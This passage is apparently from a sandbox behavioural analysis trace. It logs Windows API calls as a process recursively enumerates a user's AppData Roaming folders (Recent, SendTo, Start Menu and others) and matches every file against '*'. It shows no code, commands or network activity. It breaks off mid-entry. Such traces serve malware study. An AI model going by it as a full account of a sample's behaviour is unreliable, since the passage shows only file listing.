[0056.722] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.722] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Libraries" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0056.722] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0056.722] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0056.761] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.761] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.761] PathMatchSpecW (pszFile="CameraRoll.library-ms", pszSpec="*") returned 1 [0056.761] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.761] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.761] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.761] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*") returned 1 [0056.761] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.761] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*") returned 1 [0056.761] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.761] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*") returned 1 [0056.761] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.761] PathMatchSpecW (pszFile="SavedPictures.library-ms", pszSpec="*") returned 1 [0056.762] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.762] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*") returned 1 [0056.762] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.762] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.763] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.763] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Network Shortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0056.763] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0056.763] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0056.764] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.764] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.764] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.764] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.764] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Printer Shortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0056.764] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0056.765] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0056.765] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.765] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.765] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.765] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.765] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Recent" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent" [0056.765] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0056.765] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb072d8 [0056.766] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.766] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.766] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="AutomaticDestinations" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations" [0056.766] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0056.766] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07558 [0056.766] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.766] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.766] PathMatchSpecW (pszFile="5f7b5f1e01b83767.automaticDestinations-ms", pszSpec="*") returned 1 [0056.766] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.767] PathMatchSpecW (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*") returned 1 [0056.767] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.767] PathMatchSpecW (pszFile="9d1f905ce5044aee.automaticDestinations-ms", pszSpec="*") returned 1 [0056.767] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.767] PathMatchSpecW (pszFile="f01b4d95cf55d32a.automaticDestinations-ms", pszSpec="*") returned 1 [0056.767] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.767] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0056.767] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.768] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="CustomDestinations" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations" [0056.768] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0056.768] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb071d8 [0056.768] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.768] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.768] PathMatchSpecW (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*") returned 1 [0056.769] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.769] PathMatchSpecW (pszFile="f01b4d95cf55d32a.customDestinations-ms", pszSpec="*") returned 1 [0056.769] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.769] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.769] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.769] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.769] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.769] PathMatchSpecW (pszFile="http--www.google.com-.lnk", pszSpec="*") returned 1 [0056.769] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.769] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*") returned 1 [0056.770] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.770] PathMatchSpecW (pszFile="Mozilla Maintenance Service.lnk", pszSpec="*") returned 1 [0056.770] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.770] PathMatchSpecW (pszFile="Program Files (x86).lnk", pszSpec="*") returned 1 [0056.770] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.770] PathMatchSpecW (pszFile="System and Security.lnk", pszSpec="*") returned 1 [0056.770] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.770] PathMatchSpecW (pszFile="System.lnk", pszSpec="*") returned 1 [0056.770] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.770] PathMatchSpecW (pszFile="The Internet.lnk", pszSpec="*") returned 1 [0056.770] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.771] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0056.771] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.771] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="SendTo" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo" [0056.771] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0056.771] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07558 [0056.773] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.773] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.774] PathMatchSpecW (pszFile="Compressed (zipped) Folder.ZFSendToTarget", pszSpec="*") returned 1 [0056.774] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.774] PathMatchSpecW (pszFile="Desktop (create shortcut).DeskLink", pszSpec="*") returned 1 [0056.774] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.774] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0056.774] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.774] PathMatchSpecW (pszFile="Documents.mydocs", pszSpec="*") returned 1 [0056.774] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.774] PathMatchSpecW (pszFile="Fax Recipient.lnk", pszSpec="*") returned 1 [0056.774] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.775] PathMatchSpecW (pszFile="Mail Recipient.MAPIMail", pszSpec="*") returned 1 [0056.775] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.775] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0056.776] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.776] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Start Menu" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu" [0056.777] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0056.777] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0056.777] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.777] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.777] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.777] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.777] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="Programs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs" [0056.778] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0056.778] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07558 [0056.790] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.790] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.790] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessibility" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility" [0056.791] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*" [0056.791] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0056.791] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.791] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.791] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0056.791] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.791] PathMatchSpecW (pszFile="Magnify.lnk", pszSpec="*") returned 1 [0056.791] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.791] PathMatchSpecW (pszFile="Narrator.lnk", pszSpec="*") returned 1 [0056.791] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.791] PathMatchSpecW (pszFile="On-Screen Keyboard.lnk", pszSpec="*") returned 1 [0056.792] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.792] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.792] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.792] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessories" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories" [0056.792] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0056.792] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0056.792] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.792] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.792] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0056.792] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.792] PathMatchSpecW (pszFile="Internet Explorer.lnk", pszSpec="*") returned 1 [0056.792] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.793] PathMatchSpecW (pszFile="Notepad.lnk", pszSpec="*") returned 1 [0056.793] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.793] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.793] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.793] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Administrative Tools" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools" [0056.793] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0056.793] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0056.793] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.793] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.793] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.793] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.793] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.794] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.794] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.794] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.794] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Maintenance" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance" [0056.794] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0056.794] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0056.794] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) 